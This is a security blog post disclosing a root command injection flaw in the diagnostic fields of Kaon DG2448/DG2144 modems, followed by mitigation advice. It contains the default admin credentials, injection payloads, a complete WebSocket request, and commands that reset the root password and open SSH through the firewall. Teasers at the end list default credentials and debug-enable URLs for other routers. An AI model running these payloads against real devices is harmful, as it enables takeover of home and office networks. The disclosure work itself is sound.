Kaon DG2144 Exploit : Root Command Injection( & How To Enable SSH )

Command Injection Vulnerability in Kaon DG2448 & DG2144 Modems

Command Injection Vulnerability in: Kaon DG2448 & DG2144 Modems

Published on 7/30/24 3:17 PM

Introduction

In this post, I’ll be sharing my findings on a critical command injection vulnerability I discovered in the Kaon DG2448 and Kaon DG2144 modems. The vulnerability is a severe flaw that allows attackers to execute arbitrary commands with root privileges through the modems' web interface. I will explain the details of how the exploit works, the potential impact, and how users and organizations can protect themselves.

The Vulnerability Overview

Upon analyzing the modems’ web service, I found that several diagnostic functions are vulnerable to command injection. These functions include:

  • Ping (under Diagnostics Tab)
  • Traceroute (under Diagnostics Tab)
  • NsLookup (under Diagnostics Tab)
  • Target (Found under Connectivity Check Tab)

These functions are designed for network diagnostics, but the lack of input sanitization opens them up to command injection vulnerabilities. Attackers can leverage this flaw to execute arbitrary shell commands on the device, potentially leading to a full system compromise.

Exploit Details: How It Works

Prerequisites

To exploit this vulnerability, an attacker must:

  • Gain access to the modems’ web interface using the default credentials:
    • Username: admin
    • Password: admin@DG2144
  • (The default credentials are widely known and, if not changed, provide an easy entry point for attackers.)
  • Once logged in, the attacker can exploit the vulnerable fields under Diagnostics and Connectivity Check. By injecting commands into these fields, an attacker can execute arbitrary code.

The Command Injection

The attack begins by interacting with the Ping function, located under the Diagnostics tab. The attacker injects a command into the "Target" field, which is intended for network diagnostics but is vulnerable to command execution.

For example, by injecting the following command:

& cat /etc/passwd

This simple command causes the modem to execute the cat command, allowing the attacker to read the contents of /etc/passwd—a file that contains critical user information.

The output might include sensitive data such as:

root:x:0:0:root:/root:/bin/ash
daemon:*:1:1:daemon:/var:/bin/false
ftp:*:55:55:ftp:/home/ftp:/bin/false
...
admin:x:0:0::/home/admin:/bin/false

This leak of sensitive system information could help attackers craft further attacks or escalate their privileges.

The image below shows another example of a vulnerable api endpoint in which the request was sent directly via websocket resulting in the ability to Exploit A LFI(Local File Include) directly.

Exploiting the Vulnerability

The most concerning part of this vulnerability is its ability to allow attackers to execute arbitrary commands on the system. For instance, attackers can append additional commands to the ping function, which is executed as part of a WebSocket request. The WebSocket request used to trigger the attack looks like this:

{
    "jsonrpc": "2.0",
    "id": 1317719,
    "method": "api",
    "params": {
        "path": "/admin/ping",
        "action": "post",
        "msg": {
            "target": "& cat /etc/passwd",
            "size": "16",
            "no": "3"
        },
        "sid": "2e14d9d31758725543fc2404aeec17eb"
    }
}

When executed, this WebSocket request triggers the modem to run the following shell command:

ping -c 3 -s 64 -i 1 -W 1 & cat /etc/passwd > /tmp/ping_result 2>&1 &

This results in the modem reading sensitive system data (i.e., /etc/passwd) and storing it in /tmp/ping_result.

Further Exploitation: Gaining Root Access

The attack doesn’t stop there. Since the system executes arbitrary commands via these diagnostic functions, the attacker can escalate the exploit by running additional commands. For example:

& echo -e "password\npassword" | passwd root
& iptables -D zone_lan_input 2
& iptables -A INPUT -i eth0 -p tcp --dport 22 -j ACCEPT

With these commands, an attacker can:

  • Change the root user’s password.
  • Modify iptables firewall rules to allow SSH traffic on port 22.
  • Enable SSH access, granting the attacker full remote access to the device.

These actions would enable an attacker to take full control of the modem and potentially use it as part of a larger network attack.

The Impact of the Vulnerability

If exploited, this command injection vulnerability gives attackers the ability to:

  • Read sensitive information, such as user credentials and system files.
  • Change system configurations, including enabling SSH access, modifying user privileges, and adjusting firewall settings.
  • Gain full root access to the device, giving them complete control over the modem and the potential to pivot into the broader network.

Mitigation and Recommendations

If you’re using a Kaon DG2448 or DG2144 modem—or any device that may be vulnerable to similar issues—here are some essential security practices to mitigate this vulnerability:

  • Change Default Credentials: Always change default usernames and passwords to strong, unique values to prevent unauthorized access.
  • Update Firmware: Check for firmware updates from the manufacturer. Vulnerabilities like this can often be fixed through security patches. If updates are unavailable, consider replacing the device with a more secure model.
  • Limit Web Interface Access: Use firewall rules to restrict access to the admin interface. Ensure that only trusted IPs can interact with the modem’s web interface.
  • Implement Input Validation: Ensure that all input fields, especially those used for diagnostics and configuration, are properly sanitized and validated to prevent command injection.
  • Disable Unnecessary Features: If you’re not using specific diagnostic functions (e.g., Ping, Traceroute), consider disabling them to minimize the attack surface.

Conclusion

The Kaon DG2448 and DG2144 modems are vulnerable to a serious command injection flaw that allows remote attackers to gain root access to the devices. This vulnerability is caused by improper input validation in the web interface's diagnostic functions. If left unpatched, it could have severe consequences for users, especially those using these devices in production or unsecured environments.

As always, it’s essential to follow best security practices: change default credentials, apply firmware updates, limit exposure, and always be on the lookout for new vulnerabilities. By staying vigilant, you can help protect your devices and networks from malicious exploitation.

Comments

Post a Comment

Popular posts from this blog

f@st3864 Telnet/Serial

f@st3864 Telnet/Serial R.e F@st3864v2 Optus F@st3864 The quickest way to openly access this routers administration tools is to log in via http://192.168.0.1/main.html?loginuser=0 logging in with the default admin/Y3s0ptus loginuser=0 ***support/support ***loginuser=1 ***user/user*****loginuser=2 ***To Activate telnet*** going to management/system settings " download this file " sysinfo.f24 open the file in notepad the file splits into two sections the section we want is headed by backup config: <?xml version="1.0"?> <DslCpeConfig version="3.0"> and closed by </InternetGatewayDevice> </DslCpeConfig> so by copying all the xml information between these two points and pasting into a new notepad you have created our new backup file, before we save it and close find <X_GVT_Telnet_Enable>FALSE</X_GVT_Telnet_Enable> Change FALSE to TRUE then save the file as backupconfig.xml then use this XML file to update the settings, also i...
Read more

ZTE MF910V Root exploit

ZTE MF910/ZTE910B/ZTE MF910V/Telstra MF910v  This guide exists in both linux and windows format Please follow the instructions as per O/S or untill instructions converge |+++++++++++++++++++++++++++++++++++++| Default credentials: For ZTE MF910/ZTE910B/ZTE MF910V/Telstra MF910v root:oelinux123 Web Interface Password: password |+++++++++++++++++++++++++++++++++++++| Getting Setup: Download the mode switch html to run locally: http://lopoteam.com/3AY9 Also ensure you have ADB (Android Debug Bridge) installed on your computer: ADB: Linux: https://dl.google.com/android/repository/platform-tools-latest-linux.zip http://lopoteam.com/37Bw Windows: https://dl.google.com/android/repository/platform-tools-latest-windows.zip http://lopoteam.com/37Ac |+++++++++++++++++++++++++++++++++++++| Lets Begin |+++++++++++++++++++++++++++++++++++++| Plug your device into the computer to download drivers. Linux: Open Terminal cd ...
Read more

ZTE MF910V Mode Switch / ADB Enable / AT Commands / Debug

ZTE MF910V Mode Switch / ADB Enable / AT Commands / Debug AT mode : /goform/goform_set_cmd_process?goformId=SET_DEVICE_MODE&debug_enable=X Change X to either 0 or 1 this enables and disables qualcomm services, Debub / Adb :  /goform/goform_set_cmd_process?goformId=USB_MODE_SWITCH&usb_mode=X Change X to be the value matching the desired mode. 1-4 is RNDIS 5 is CDC 6 is ADB. or this page is uploaded to any web dir: UPDATED(2017) Download this file: tools.html Upload it to any directory and use it to switch thru modes via html
Read more